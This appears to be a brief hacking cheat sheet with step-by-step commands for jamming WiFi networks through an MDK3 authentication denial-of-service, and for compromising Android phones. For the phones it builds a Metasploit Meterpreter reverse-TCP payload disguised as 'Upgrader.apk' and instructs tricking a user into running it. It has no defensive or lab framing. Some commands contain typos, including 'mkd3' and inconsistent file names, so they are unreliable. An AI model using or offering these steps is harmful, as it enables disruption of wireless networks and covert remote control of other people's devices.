# Wifi jamming with MDK3.

Step 1: airmon-ng start wlan0
Step 2: airodump-ng wlan0 [& copy your bssid]
Step 3: mkd3 wlan0 a -e (bssid)

Wherein, a = authentication DoS mode.
         e = To send to specified bssid.
         
         
# Hacking Android Phones

Step 1: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.19 R > /root/Upgrader.apk
Step 2: Start metasploit by typing 'msfconsole'
Step 3: use exploit/multi/handler
Step 4: set payload android/meterpreter/reverse_tcp
Step 5: set LHOST=192.168.1.19
Step 6: Type "exploit" to start the listener.
Step 7: Copy the Upgradder.apk file to phone and make the user run the file.
